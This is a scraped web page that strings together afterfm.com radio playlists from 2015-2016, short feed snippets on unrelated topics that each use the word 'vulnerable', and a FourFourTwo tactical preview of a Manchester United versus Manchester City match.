Anthony DAmato- If Youre Gonna Build A Wall - Cold Snap
Los Lobos- Bootleg - Quiero Creedence
Chris Beall- Crossroads - Brand New World
Ccile DooKingu- Pure Entertainment - Anybody Listening Dialogues Pt 2
- voicebreak -
Of Montreal- Chaos Arpeggiating - Innocence Reaches
TOR- Vaults - Blue Book
Crystal Castles- Their Kindness Is Charade - Amnesty I
The Silver Lake Chorus- Timberline - To Emmylou
Future Generations- This Place We Go - Future Generations
Emma Louise- Everything Will Be Fine - Supercry
- voicebreak -
Roger Fisher- Rivers Of Soul - All Told
Danny Green Trio- Porcupine Dreams - Altered Narratives
C Duncan- A Year Or So - EP
Don DiLego- Idiot Heart - Magnificent Ram A
Wages- Stalingrada - Glace
Corey Christiansen- Factory Girl - Factory Girl
- voicebreak -
Quaker City Night Hawks- Beat The Machine - El Astronauta
Goldenchild- There Is A Light That Never Goes Out - Bridges
DJ Shadow- Depth Charge - The Mountain Will Fall
Gang Of Four- I Found That Essence Rare - Entertainment
Thee Oh Sees- Jammed Entrance - A Weird Exits
9bach- Anian - Anian
- voicebreak -
Bjrk- I See Who You Are - Vulnicura Live
Carl Broemel- 4th Of July - 4th Of July
Colourbox- Hot Doggie - Lonely Is An Eyesore
Earth Heart- Burn - Homesick
Deerhoof- Debut - The Magic
Sofi Tukker- Drinkee - Soft Animals EP
Quantic Presents Flowering Inferno- Flowering Theme feat Flowering Inferno - 1000 Watts
- voicebreak -
The Julie Ruin- I Decide - Hit Reset
Phantom Phunk- Hey There - Arboles Ossific
Gringo Star- Going Home - The Sides And In Between
Car Seat Headrest- 1937 State Park - Teens Of Denial
Red Martian- Cowboy And The Vocoder - Retrailing
Matt Script- See You Anymore - See You Anymore
Margaret Glaspy- You Dont Want Me - Emotions And Math
playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/35/playlistDate/2016-09-07
|The Afternoon Sound Alternative 08-23-2016 with EC||
Corinne Bailey Rae- Tell Me - The Heart Speaks In Whispers
Prince Far I- Black Man Land - Black Man Land
Emma Louise- Talk Baby Talk - Supercry
Wye Oak- No Dreaming - Tween
Oran Etkin- Nama - The Same Heart Original Motion Picture Soundtrack
Bjrk- Notget - Vulnicura Live
Ron Whitehead- Never Give Up - I Will Not Bow Down
9bach- Yr Olaf - Anian
Mats Wawa- Planet Of The Grapes - Classics EP
- voicebreak -
Magazine- Under The Floorboards - After The Fact
Devendra Banhart- Heard Somebody Say - Cripple Crow
Sonic Youth- Unknown Theme - Spinhead Sessions
Samaris- Wanted 2 Say - Made In Iceland Vol 8
Greylag- Yours To Shake - Greylag
Renato Braz- Sodade Meu Bem Sodade - Saudade
The Colorblind James Experience- A Different Bob - The Colorblind James Experience
Iggy Pop- Nightclubbing - Nude Rude The Best Of
Black Mountain- Mothers Of The Sun - IV
Joseph Arthur- BigCity Secrets - Big City Secrets
Feronia- Little Bird - To Emmylou
Beth Orton- Wave - Kidsticks
- voicebreak -
Leon Redbone- Diddy Wa Diddie - Double Time
MAYA ANGELOU- On Working White Liberals - BLACK PEARLS
MAYA ANGELOU- Homewreckers Lament - BLACK PEARLS
Caetano Veloso Gilberto Gil- Terra Ao Vivo - Dois Amigos Um Sculo De Msica Multishow Live
David Bowie- Blackstar - Blackstar
Zola Jesus- Hikikomori - Conatus
So Percussion- September - Amid The Noise
- voicebreak -
Vampire Weekend- Cape Cod Kwassa Kwassa - Vampire Weekend
Lint- Jolly Bobbins - Sexyharassment
Compass Mexican Institute Of Sound Toy Selectah- Before The Sunset feat Gael Garcia Bernal Stela Campos Bruno Morais Iara Renno - Compass
Paul McCartney Linda McCartney- Ram On - RAM
The Hot Sardines- When I Get Low I Get High feat Alan Cumming - French Fries Champagne
playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/20/playlistDate/2016-08-23
|Stable core, vulnerable heart||I went to yoga tonight and we were in lunges, bending into our front knees, figuring out where our stomachs and pelvises were, raising hands over head, pushing shoulders down, opening heart â “Stable core, vulnerable heart.”Â Basic, physical advice on holding the pose and not falling over and also the biggest coolest thing I […]|
|Honda listed as vulnerable incumbent â but how vulnerable is he?||San Jose Rep. Mike Honda is back on Roll Call’s “10 Most Vulnerable House Members” list, but he’s likely telling his supporters not to worry. After all, he wasÂ on the same list a month before the June 2014 primary and dropped off it in August after thumping fellow Democrat Ro Khanna in that primary. Not|
|Are we vulnerable to viruses while on chemo?|
I know our immune systenm is low but I'm not sure it's the same with all chemos? Maybe some are worse than others for that? I'm on Vectibix and when I see my onc she always stresses that I'm sun sensitive and to be careful but hasn't said anything about low immunity issues.
My husband has been battling a stomach bug that he finally was scanned for yesterday and they think it's a virus. He's usually very supportive but he didn't ask the doctor if I need to worry or if we should be extra careful about disinfecting things like taps or doorknobs or anything like that. When I aske dhim if he'd asked he got all snarky and said maybe he should move out until he's better and crap like that so I don't have an answer. I'd asked him to ask the doctor when he got the call but he forgot. I just left a message at the doctor's to ask myself so I'm waiting to hear back. They don't know what the virus is or even if it is for sure.
What would you do in the meantime? I have a few ideas of precautions but there might be something obvious I'm not thinking of. Or are viruses something that's not easily transferred?
|Classy Alternative to an Upturned Hanging Basket||Clever old Crocus always has innovative and attractive products. Regular followers of this blog will know that I recommend upside down hanging baskets to protect vulnerable plants and now Crocus have come up with a stylish alternative. They will be available in green or grey in two sizes and should appear on their website in […]|
|The Afternoon Sound Alternative 01-22-2016 with Mark Doyle||
Evelyn Evelyn- A Campaign Of Shock And Awe - Evelyn Evelyn
Midnight Oil- White Skin Black Heart - 20000 Watt RSL Greatest Hits
Sophe Lux- Marie Antoinette Robot 2073 a Rock Opera - Waking The Mystics
SIKORA- Sins Of Our Youth - Eye Kandi EP
- voicebreak -
David Bowie- Blackstar - Blackstar
Pretty Balanced- Concertgoing - Icicle Bicycle
Bones Beeker- In Search Of Signs - Bones Beeker
Warsaw Village Band- Hey You Yokels Son - Nord
Wye Oak- Dogs Eyes - Civilian
- voicebreak -
Dweezil Zappa- Hummin - Via Zammata
Tame Impala- Jeremys Storm - InnerSpeaker Collectors Edition
Nickel Creek- Hayloft - A Dotted Line
Portishead- The Rip - Third
Fifth Veil- Across The Mesa - Lanterns
Iva Bittov Gyan Riley Evan Ziporyn- Farewell - Eviyan Live
The Bird And The Bee- Come As You Were - One Too Many Hearts EP
Wand- Dovetail - 1000 Days
- voicebreak -
The GOASTT- Devil You Know - Midnight Sun
Beth Custer- Ive Heard It Before - Vinculum Symphony Live
Franoiz Breut- La Fille Des Eaux - La Fille Des Eaux Single
Mercedes Peon- Babel - Mercedes PeonSOS
Charlotte Gainsbourg- Greenwich Mean Time - IRM
- voicebreak -
Os Mutantes- Once Upon A Flight - Fool Metal Jack
Pretty Balanced- Euros And Pounds - Icicle Bicycle
Billy Tipton Memorial Sax Quartet- Argonauts - Pollo D Oro
Pretty Balanced- Euros And Pounds - Icicle Bicycle
Ty Segall- The Singer - Manipulator
Bjrk- Mouth Mantra - Vulnicura
- voicebreak -
Chimney Choir- In This Light - Boomtown
Anna Homler Geert Waegeman Pavel Fajt Koen VAN ROY- Rosalie - Corne De Vache
Kate Bush- Get Out Of My House - The Dreaming
- voicebreak -
Stan Ridgway- Talkin Wall Of Voodoo Blues - SNAKEBITE Blacktop Ballads Fugitive Songs
Silent Warhall- Isolation Blues - Hard On
Lay Low- Please Dont Hate Me - Live At Home
playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/65/playlistDate/2016-01-22
|The Afternoon Sound Alternative 10-20-2015 with Barry Roark||
Various Artists- Your Beat Kicks Back Like Death - SC100 Secretly Canadians 100th Release
Various Artists- Soft Evenigs - SC100 Secretly Canadians 100th Release
King Tubby- A Murderous Dub - From The Palace Of Dub
Van Morrison- Sweet Thing - The Essential Van Morrison
- voicebreak -
Tricky- We Dont Die - False Idols
Dengue Fever- Still Waters Run Deep - The Deepest Lake
Alaska In Winter- Staring At The Sun - Dance Party In The Balkans
Dubchek- Puppy Train - Down Memory Gap Lane
Sprechen Sie Deutsch- Police And Thieves - Reno 911 Miami
A Tribe Called Red- Electric Intertrival Feat Smoke Trail Ojibway - Nation II Nation
Modest Mouse- Tiny Cities Made Of Ashes - The Moon Antarctica
They Might Be Giants- Glean - Glean
R- Ravens Rub Mix - Poor Leno
Happy Mondays- Bobs Yer Uncle - Loads
Quitapenas- Guayabo - Quitapenas
Heavyweight Dub Champion- Blessed Is The Seed - Survival Guide For The End Of Time
Delicate Steve Dustin Wong- Flyin High - Wondervisions
Various Artists- King Crimson Three Of A Perfect Pair - Sometimes God Smiles
Bruce Cockburn- Maybe The Poet - Stealing Fire Deluxe Edition
- voicebreak -
Various Artists- - The Complete Death Of Cool Parts 1 2
Dub Spencer Trance Hill- Smoke On The Water Deep Purple - Riding Strange Horses
JJ DOOM- Gmo - Key To The Kuffs
Adrian Younge- Turn Down The Sound feat Loren Oden - Linear Labs Los Angeles
Greensky Bluegrass- Worried About The Weather - If Sorrows Swim
The Wolfgang Press- People Say - Funky Little Demons
- voicebreak -
Fly Ashtray- Barrys Time Machine - Tone Sensations Of The Wondermen
Various Artists- Magnus Buchan feat Community Recordings - Natural Selection Vol 1
- voicebreak -
Trevor Jones- The Glade Pt II - The Last Of The Mohicans Original Motion Picture Soundtrack
Bjrk- Stonemilker - Vulnicura
- voicebreak -
The Domestics- What A Life - The Domestics
Pest- Ogres - All Out Fall Out
A Night Of Serious Drinking- Shades Of Another Color - One After Another
- voicebreak -
Tommi Eckhart- Casino Solid State Remix - Run Lola Run Original Motion Picture Soundtrack
playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/20/playlistDate/2015-10-20
|The Best Use of Hanging Baskets||Ever since Germaine Greer said that hanging baskets reminded her of heads lining the road to the Forum, Iâve found it hard to like them when used for their intended purpose. But I do find them perfect for discreetly protecting precious or vulnerable plants like these cyclamen. They donât need to be as decorative as […]|
|Free Cyclamen||Last autumn I dug up a clump of vulnerable cyclamen seedlings and potted them into individual cells. They have spent the winter in semi-shade near the greenhouse and are looking good. Iâm planning to let them grow on until next autumn when I will plant them in the woodland garden. One of the best indicators […]|
|The Afternoon Sound Alternative 06-24-2015 with Dave Blackwood||
Django Django- Shake Tremble - Born Under Saturn
They Might Be Giants- Underwater Woman - Glean
- voicebreak -
Hot Chip- Huarache Lights - Why Make Sense
Bomba Estreo- Caderas - Amanecer
Sounds From The Ground- Step Into Now - 20 Years Of The Best Sounds From The Ground
Srikalogy- Dronesphere - New Paradigm
Jaga Jazzist- Big City Music - Starfire
Compilation- UFOs - The Best Of Undisputed Truth Smiling Faces
Billy Gibbons Co- Oh Well - Just Tell Me That You Want Me A Tribute To Fleetwood Mac
Willie Nelson Merle Haggard- Its All Going To Pot - Django And Jimmie
Sonny Knight The Lakers- Day Tripper Live - Do It Live
Monophonics- Promises - Sound Of Sinning
James Brown- Aint It Funky Now Pts 1 2 - Soul Pride The Instrumentals 19601969
- voicebreak -
Hiatus Kaiyote- Swamp Thing - Choose Your Weapon
Young Fathers- Still Running - White Men Are Black Men Too
A Tribe Called Red- Bodyslam - Suplex EP
Bonobo- Flashlight - Flashlight Single
Calle 13- Atrevetetete - Calle 13
The Mothers Of Invention- Help Im A Rock - Freak Out
Muddy Waters- I Wanna Just Make Love To You - Electric Mud
Jason Isbell- 24 Frames - Something More Than Free
Minutemen- Bob Dylan Wrote Propaganda Songs - What Makes A Man Start Fires
Matthew E White- Rock Roll Is Cold - Fresh Blood
Stefano Nyerenda- Women Today Take Care Of Business - I Have No Everything Here
Tony Allen- Moving On - Film Of Life Deluxe Edition
The Silver Lake Chorus- Hold Up For - The Silver Lake Chorus
- voicebreak -
Fito Olivares Kumbia Kings- Azcar - AB Quintanilla III Kumbia Kings Presents Greatest Hits Album Versions
The Clash- Clampdown - London Calling
James Kochalka- Hockey Monkey - Monkey Vs Robot
- voicebreak -
Goat- Goatchild - Commune
Bjrk- Black Lake - Vulnicura
playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/35/playlistDate/2015-06-24
|The Afternoon Sound Alternative 06-23-2015 with Wally||
John Frusciante- Murderers - To Record Only Water For Ten Days
Delicate Steve- Sugar Splash - Wondervisions
Department Of Eagles- Forty Dollar Rug - The Cold Nose
Maker- The Love We Have - Maker Vs NowAgain
New Orleans Suspects- Pocketful Of Grits - Ouroboros
Ty Segall- The Singer - Manipulator
Chico Trujillo- Playas Marinas feat Henrique Alvarez - Reina De Todas Las Fiestas
Goat- Goatslaves - Commune
Karl Hector The Malcouns- The Cave - Coomasi
Frank Solivan Dirty Kitchen- The Letter - On The Edge
The Tallest Man On Earth- Timothy - Dark Bird Is Home
Big Gigantic- The Night Is Young feat Cherub - The Night Is Young
Bjrk- Lionsong - Vulnicura
My Morning Jacket- Golden - It Still Moves
Run The Jewels ELP- Get It - Run The Jewels Instrumentals
A A Bondy- The Heart Is Willing - Believers
Tennis- Never Work For Free - Ritual In Repeat
Calexico- Alone Again Or - Convict Pool
Sohail Rana- Badal Aur Bijli - Disco Dildar
The Babysitters- Dancers Dont Go - Split Seams
Shakey Graves- The Perfect Parts - And The War Came
Rapidgrass Quintet- Cottonwood Pass - Crooked Road
Trampled By Turtles- Come Back Home - Wild Animals
The Polish Ambassador- Earth Versus The World - Diplomatic Immunity
The Felice Brothers- No Trouble - Favorite Waitress
Viet Cong- Pointless Experience - Viet Cong
Metronomy- A Thing For Me Breakbot Remix - A Thing For Me EP
Shpongle- Dorset Perception - Tales Of The Inexpressible
Donovan- Hurdy Gurdy Man - Hurdy Gurdy Man
William Onyeabor- Atomic Bomb feat Hot Chip - What
Father John Misty- True Affection - I Love You Honeybear
Lake Street Dive- My Speed - Lake Street Dive
El Puma- Whiter Shade - Casa De Mi Padre Original Motion Picture Soundtrack
Tim Kasher- Aspidistra - While No One Was Looking Toasting 20 Years Of Bloodshot Records
Foxygen- Brooklyn Police Station - And Star Power
Goat- Bondye - Commune
Galactic- Moog Marmalade - We Love Em Tonight Live At Tipitinas
Sierra Hull- What Do You Say - Daybreak
Frank Zappa The Mothers Of Invention- San Berdino - One Size Fits All
Emancipator- Soon It Will Be Cold Enough To Build Fires - Soon It Will Be Cold Enough
Warm Soda- All Grown Up - While No One Was Looking Toasting 20 Years Of Bloodshot Records
Heartless Bastards- Only For You - Arrow
Calexico- Algiers - Algiers
playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/20/playlistDate/2015-06-23
|The Afternoon Sound Alternative 06-01-2015 with Gavin Dahl||
Tour De Force- The Traveler StepArt Remix - Battle Cry Remixed
Rebirth Brass Band- On My Way - Move Your Body
The Budos Band- Shattered Winds - Burnt Offering
The Budos Band- Magus Mountain - Burnt Offering
Dengue Fever- No Sudden Moves - The Deepest Lake
Courtney Barnett- Elevator Operator - Sometimes I Sit And Think And Sometimes I Just Sit
Bob Darin- Me And Mr Hohner - Country Funk Volume II 19671974
Townes Van Zandt- Hunger Child Blues - Country Funk Volume II 19671974
Shakey Graves- Call It Heaven feat Esm Patterson - And The War Came
Scott H Biram- Nam Weed - Nothin But Blood
Hanni El Khatib- Chasin - Moonlight
Yogi Bear- The Missing Elephant - Huckleberry Hound The Great Kelloggs TV Show
Elephant Revival- Drop - Break In The Clouds
Euforquestra- Instant Coffee feat Kyle Hollingsworth - Fire
Ty Segall- Stick Around - Manipulator
The Very Best- Hear Me - Makes A King
Xperience- Evolve Away - All Your Friends Friends
AKA- Where The Free People Go - All Your Friends Friends
Tour De Force- Old Time Love - Battle CryBattle Cry Remixed
Lapalux- We Lost - Lustmore
Prefuse 73- Infrared feat Sam Dew - Rivington No Rio
THEESatisfaction- Planet For Sale - EarthEE
Iame Gold Miz- We Never Look Up - All Your Friends Friends
Ali Shaheed Muhammad Souls Of Mishchief- There Is Only Now feat Snoop Dogg - There Is Only Now Remix feat Snoop Dogg William Hart
Ali Shaheed Muhammad Souls Of Mischief- All You Got Is Your Word Instrumental - There Is Only Now Remix feat Snoop Dogg William Hart
Odesza- Sun Models feat Madelyn Grant - In Return
Odesza- White Lies feat Jenni Potts - In Return
Hard To Find- Robert Koch - Antennae Presents Acid Crunk Vol 2
Slow Magic- Waited 4 U Odesza Remix - Single
Bjrk- Mouth Mantra - Vulnicura
Caribou- Cant Do Without You - Our Love
Doldrums- We Awake - The Air Conditioned Nightmare
Bonobo- Return To Air - Flashlight Single
La Santa Cecilia- Tainted Love - El Valor EP
Antibalas- Dirty Money - Dirty Money Single
Eno Hyde- Dbf - High Life
Bob Marley The Wailers- And I Love Her - Greatest Hits At Studio One
Jim Ford- Rising Sign - Country Funk Volume II 19671974
Courtney Barnett- Kims Caravan - Sometimes I Sit And Think And Sometimes I Just Sit
PJ The Galaxies- One Mint Julep - Rare Surf Vol 1
Compilation- Leap Frog - Verve Jazz Masters 10 Dizzy Gillespie
Cannonball Adderley- Ill Remember April - Cannonball Enroute
Paul Oscher- Cannonball Rock - The Best Of Paul Oscher Vol 1
playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/5/playlistDate/2015-06-01
|The Afternoon Sound Alternative 03-27-2015 with Nat||
- voicebreak -
- voicebreak -
- voicebreak -
Laibach- Final Countdown - Nato
Portishead- Machine Gun - Third
Talking Heads- Listening Wind - Remain In Light Remastered
Brian Eno David Byrne- Regiment - My Life In The Bush Of Ghosts
Atomic Ape- Passenger - Swarm
Tom Waits- Starving In The Belly Of The Whale - Blood Money
Man Man- Zebra - The Man With A Blue Turban With A Face
Ben Gallagher- Beleaguered - Heart Shaped Rocks
Sparklehorse- Weird Sisters - Vivadixiesubmarinetransmissionplot
Paleo- A View Of The Sky - A View Of The Sky
Ian Cooke- Vasoon - The Fall I Fell
Deerhoof- Oh Bummer - La Isla Bonita
Various Artists- Gang Of Four Naturals Not In It - Marie Antoinette
Television- See No Evil - Marquee Moon
Bostich Fussible- Into Your Heaven - Motel Baja
Amsterdam Klezmer Band- Op Je Hoede feat Lilian Vieira - Blitzmash
Lisandro Meza Y Su Combo Gigante- Juventud Flaca Y Loca - The Afrosound Of Colombia Vol 2
La Sucursal De La Cumbia- Rtmo Popular - Cumbia A Domicilio
Goran Bregovic- Cajesukarije Cocek - Ederlezi
Balkan Beat Box- Cha Cha - Balkan Beat Box
Burning Spear- Jordan River - Marcus Garvey Garveys Ghost
The Gladiators- Looks Are Deceiving - Trenchtown MixUp
Midnite- Banking In The Pig - Ras Mek Peace
The Viceroys- Ya Ho - The Viceroys Inna De Yard
Willie Williams- Master Plan - The Legendary Studio One Records
Prince The Revolution- Erotic City - The Hits The BSides
Compilation- Its A New Day Pts 1 2 - In The Jungle Groove
Sly The Family Stone- I Want To Take You Higher - Stand Bonus Version
JeanClaude Vannier- LOurs Parasseux - ElectroRapide
Moondog- Minisym 1 - Moondog
Black Moth Super Rainbow- Psychic Love Damage - Cobra Juicy
Ten And Tracer- Dodecahedron Leads The Way - Youll Be A Hero Soon Speaker
Bjrk- Black Lake - Vulnicura
playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/65/playlistDate/2015-03-27
|The Afternoon Sound Alternative 02-27-2015 with Nat||
- voicebreak -
- voicebreak -
- voicebreak -
Black Sabbath- Sweet Leaf - Master Of Reality
Halden Wofford And The HiBeams- Pretty Boy Floyd - Rocky Mountain Honky Tonk
International Submarine Band- Truck Driving Man - Truckers Kickers Cowboy Angels The Blissed Out Birth Of Country Rock Volume 1 19661968
The Byrds- One Hundred Years From Now - Sweetheart Of The Rodeo
Buffalo Springfield- Pay The Price - Buffalo Springfield
The Dillards- Nobody Knows - Truckers Kickers Cowboy Angels The Blissed Out Birth Of Country Rock Volume 1 19661968
Creedence Clearwater Revival- Fortunate Son - Willy And The Poor Boys 40th Anniversary Edition Remastered
Songs Ohia- Farewell Transmission - Magnolia Electric Co 10th Anniversary Deluxe Edition
Lisandro Meza- Cumbia Negra - Realeza De La Cumbia Sonidera
Los Corraleros De Majagual- Si No Me Quieres No Me Engaes - Que Rico Sabor Colombiano
Chancha Via Circuito- Bosques Va Temperley feat Kumbha Kethu - Rodante
Senor Coconut Y Su Conjunto- Autobahn - El Baile Aleman
Davie Allan The Arrows- The Chase - The Wild Angels Original Motion Picture Soundtrack
Ronee Blakley- Tapedeck In His Tractor - Nashville The Original Motion Picture Soundtrack
Pere Ubu- Caligaris Mirror - Dub Housing
Davie Allan The Arrows- Theme From The Wild Angels - The Wild Angels Soundtrack
Talking Heads- Road To Nowhere - Little Creatures Remastered
- voicebreak -
- voicebreak -
Rabbit Rumba- Nuestro Ayer - Soul Jazz Records Presents Gipsy Rhumba The Original Rhythm Of Gipsy Rhumba In Spain 19651974
A Hawk And A Hacksaw- Foni Tu Argile - Dlivrance
Besh O Drom- Makedn - Gy
Mariana Sadovska- Kupala - Just Not Forever
Bjrk- Atom Dance - Vulnicura
Equulei- Polemic Verses - Fifteen Hours Twenty Eight Minutes
Arovane- Cleiy - Ve Palor
Aphex Twin- CIRCLONT6A 14198 syrobonkus Mix - Syro
Aphex Twin- Diskhat1 - Computer Controlled Acoustic Instruments Pt2 EP
Aldo Ciccolini- Trois Gymnopdies 1888 I Lent Et Douloureux - Essential Satie
Geinoh Yamashirogumi- Primordial Germination - Ecophony Rinne
Messer Chups- Mess Surf - Cocktail Dracula
Malory- Beauty - Not Here Not Now Remastered Bonus Tracks
Oneohtrix Point Never- Meet Your Creator - Commissions I Single
playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/65/playlistDate/2015-02-27
|The Afternoon Sound Alternative 02-13-2015 with Nat||
- voicebreak -
- voicebreak -
- voicebreak -
- voicebreak -
Ian Cooke- Music - The Fall I Fell
Ark Life- Let Your Heart Break - The Dream Of You Me
Paper Bird- Blood Bones - Rooms
Dovekins- Golden Pennies - Assemble The Aviary
Spirits Of The Red City- Halfway Poem - Jula
Porlolo- Cannonball - Everything Barely Single
- voicebreak -
Clouds Mountains- Little Bear - Slumber
Tunng- Surprise Me 44 - This Is Tunng Mothers Daughter And Other Tales
Mm- Green Grass Of Tunnel - Finally We Are No One
Bjrk- Lionsong - Vulnicura
Mahogany- Optimism - The Dream Of A Modern Day
My Bloody Valentine- I Only Said - Loveless
Blonde Redhead- Dr Strangeluv - 23
Tujiko Noriko- Tokyo Tower - From Tokyo To Naiagara
Massive Attack- Teardrop - Mezzanine
King Tubby- Freak Out Skank The Upsetters - In Fine Style
Twilight Circus Dub Sound System- Lowell And Nine Dub Plate - Dub Plate Selection
Rhythm Sound- Dem Never Know Sleeparchive Remix - See Mi Yah Remixes
Tiken Jah Fakoly- Le Prix Du Paradis - Dernier Appel Canada Version
Igorrr- Tendon - Baroquecore Ep
playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/65/playlistDate/2015-02-13
|The Jobs Most Vulnerable to Automation|
Any parent or teenager not thinking very hard about this list is putting themselves at a severe disadvantage. And a lot of the jobs will surprise you. Being a waiter at a restaurant is remarkably resilient because the robots required to move around quickly, juggle lots of food, make quick adjustments, read peoples’ temperaments, attitudes, etc., and adjust...
|Unsupervised Learning: No. 74|
This week’s topics: Shadow Brokers, fingerprinting Netflix traffic, Magneto vuln, Juniper advisories, Amazon speaker tech, Facebook’s 100Gbit optical switches, Google Hire, Minecraft currency, a solar-powered water harvester, OWASP Top 10 draft comments, remote SSH, EC2 and NAT firewalls, deep learning is a black box, discovered links, and moreâ¦ This is Episode No. 74 of Unsupervised Learning—a weekly show...
|What is the role of a permanent indwelling urethral catheter in the treatment of BPH?|
The post What is the role of a permanent indwelling urethral catheter in the treatment of BPH? appeared first on Health tips.
Some sufferers with prostatic obstruction and a vulnerable bladder will be unable to void, despite what kind of surgical intervention is employed. A few of these sufferers select to be managed with an indwelling...
|Sex Trafficking and the Refugee Crisis: Exploiting the Vulnerable||Caroline OâLearyÂ is an internÂ in theÂ Ce|
|31 DE MARZO -|
DÃA NACIONAL DEL AGUA Sabemos que el agua es imprescindible para el ser humano y todos los seres vivos, sin ella es imposible la vida. Con el objetivo de estimular en todos los argentinos la conciencia en el uso de los recursos hÃdricos, se estableciÃ³ que el 31 de marzo se celebre el DÃa Nacional del Agua, por ResoluciÃ³n Ministerial NÂ° 1630 del aÃ±o 1970. El agua es un recurso renovable, limitado, frÃ¡gil y vulnerable. Si bien abunda en el planeta, solo el 3% es dulce, apta para el consumo humano. La escasa reserva de agua en el mundo, sometida a una presiÃ³n sin precedentes, a causa del crecimiento demogrÃ¡fico, la evoluciÃ³n del estilo de vida y los progresos de la industrializaciÃ³n, representa una preocupaciÃ³n alarmante por el agotamiento de las capas freÃ¡ticas, desecamiento de lagos y rÃos, contaminaciÃ³n y desertificaciÃ³n crecientes.
|Elf Draws on Pictures|
The Elf used a white board marker and drew on my kids pictures. They got a kick out of it, but then thought it was okay to do it themselves.
|Man United vs Man City tactical preview: Why aggression could help Jose pummel Pep||Jose Mourinho is not known for building fervent pressing machines like Jurgen Klopp, Mauricio Pochettino or Pep Guardiola are. The Portuguese tends to prefer compact sides who wait for opponents inside their own half and come armed with a gameplan based on transitions that catch defences off guard.
This reactive tendency has seenManchester United cede the initiative to their rivals; across their first two league games, against Bournemouth and Southampton, they averaged less than 50% possession. But against Manchester City on Saturday, recent trends suggest Mourinho would be wise to adopt a more aggressive approach in the opening stages in a bid to take an early lead.
Flying out the blocks
The indications come from certain high-stakes games involving various Guardiola sides. While the Catalan is a master at conceiving strategies tailored to each opponent, his basic principles never change: press high, move the ball quickly, play it out from defence. The discarding of Joe Hart underlines the importance Guardiola places upon building from the back, as do the expensive acquisitions of John Stones (Â£47.5m) and Claudio Bravo (Â£15m).
The most common consequence of such a strategy is that Guardiolaâs men regularly overwhelm the opposition with their intensity, movement and precision, as they did in the first half against West Ham. But there have been times when teams press them high in the opening stages, taking advanting of the fact that Guardiola's passing game hasn't had chance to settle into a rhythm. At its best, this approach leads to an early opening goal, allowing teams to sit back and counter-attack while protecting their 1-0 lead.
The 20-second goal
There have been some notable examples. One was the 2009 Champions League Final, in which Sir Alex Ferguson told his players to close down all options whenever Victor Valdes had the ball. Within eight seconds, they'd forced the Barcelona goalkeeper into passing it over the touchline. Still inside 90 seconds, Cristiano Ronaldo's free-kick was nearly converted by Park Ji-sung on the rebound. After nine minutes, United led 5-0 on shots. Only then did Samuel Etoâo score. âWe had been lucky to survive the opening minutes,â Guardiola later said.
In December 2011, Mourinho followed suit with his own team. In a crucial ClÃ¡sico at the Santiago Bernabeu, Real Madrid pressed BarÃ§a high up the pitch, closing down all options; Valdes duly played a short pass which was intercepted outside the box, leading Karim Benzema to score after just 20 seconds. Guardiola later made clever changes to win it 3-1, but the initial pressing strategy had paid off.
Another instance came last April, when Atletico Madrid faced Bayern Munich at home in the Champions League semi-finals. Diego Simeone launched intensive pressure in the first 15 minutes, with a rocking Vicente Calderon roaring every challenge. Bayern seemed stunned and, on 11 minutes, Saul Niguez slalomed past three players to score. Atletico then dropped deeper and sealed a 1-0 win.
A City under construction
Judging by the two most recent examples, it could work in United's favour that the first Manchester derby of the season takes place at Old Trafford; both Madrid and Atletico scored their early goals when inspired by a feisty home crowd, and the Red Devils will surely kick off the derby backed by a cauldron of noise.
Yet an even bigger advantage is the opposition itself. The three aforementioned examples have all been against glittering Guardiola sides who were well-accustomed to his methods. BarÃ§a had nearly played a full season under him by the 2009 final, and were even better drilled by late 2011. Bayern had worked with him for nearly three years by the time they visited the Calderon last season.
Saul scores against Bayern
Furthermore, the players were better. Valdes and Manuel Neuer were among the best goalkeepers on the ball in Europe. Guardiola could also count on slick defenders such as Gerard Pique and Jerome Boateng, playmakers such as Xavi and Thiago Alcantara, and, perhaps most crucially, defensive midfielders like Sergio Busquets and Xabi Alonso, who hardly ever lost the ball no matter how great the pressure.
For now, City fall short of such standards. The players are gifted but have only played three league games under Guardiola and will need months to fully master his complex ways, the process of playing out from the back being no exception. Bravo, who might make his debut against United, has never played with his team-mates before. The underlying relationships that united BarÃ§a and Bayern will not yet have been forged at City.
Neither is Stones at the level of Pique or Boateng, and the full-backs are still learning their new inverted roles. Anchorman Fernandinho, while an excellent all-round midfielder, is no Busquets or Alonso in possession. City are still building under Guardiola and would surely be far more vulnerable when playing out from the back than any of the sides mentioned above.
Signs of shakiness
Some nervy episodes have already taken place against more modest opposition. City started the season by conceding a free-kick to Sunderland just outside the box after a misplaced Aleksandar Kolarov pass had ruined an attempt to play their way out. On another occasion, Willy Caballero sent the ball straight to Duncan Watmore, who started a dangerous move.
The process did not look completely fluent at Stoke either, where Caballero had a pass-completion rate of just 58.3%.
Such factors may tempt Mourinho into launching another offensive early on. His players have been impressively organised without the ball in United's first three league games and already seem to grasp the defensive structure. He rightly believed that Madrid could press BarÃ§a into errors back in 2011. On Saturday, a repeat of that strategy might well be worth a try.
NOW READ THESE
The 10 best Manchester derbies ever
Quiz! Can you name the lineups from Man United 3-1 Man City (2006/07)?
New features every day on FourFourTwo.com